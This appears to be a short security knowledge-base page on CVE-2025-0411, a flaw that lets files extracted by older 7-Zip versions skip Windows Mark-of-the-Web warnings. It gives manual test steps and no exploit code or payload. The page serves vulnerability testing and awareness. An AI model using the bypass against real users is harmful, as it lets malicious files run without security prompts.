Bypassing Mark of the Web with 7zip CVE-2025-0411
Introduction
7-Zip Mark-of-the-Web Bypass Vulnerability. This vulnerability allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of archived files. When extracting files from a crafted archive that bears the Mark-of-the-Web, 7-Zip does not propagate the Mark-of-the-Web to the extracted files. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current user. Was ZDI-CAN-25456.
Exploitation Steps
Testing for CVE-2025-0411 on a Windows Machine:
Prerequisites:
A Windows machine with an outdated version of 7-Zip (prior to version 24.09).
A crafted archive designed to exploit the CVE-2025-0411 vulnerability.
Steps:
Prepare the Environment:
Ensure that 7-Zip version 24.08 or earlier is installed on the Windows machine.
Obtain a crafted archive that exploits the vulnerability. This archive should be designed to bypass the MoTW when extracted.
Conduct the Test:
Download the crafted archive from an external source (e.g., via a web browser) to ensure it receives the MoTW.
Right-click the downloaded archive, select "Properties," and verify the presence of the MoTW message: "This file came from another computer and might be blocked to help protect this computer."
Use 7-Zip to extract the contents of the archive.
After extraction, right-click the extracted files, select "Properties," and check if the MoTW is absent.
Attempt to execute the extracted files. If they run without security warnings, it indicates that the MoTW was bypassed successfully.
REFERENCES
Last updated
Was this helpful?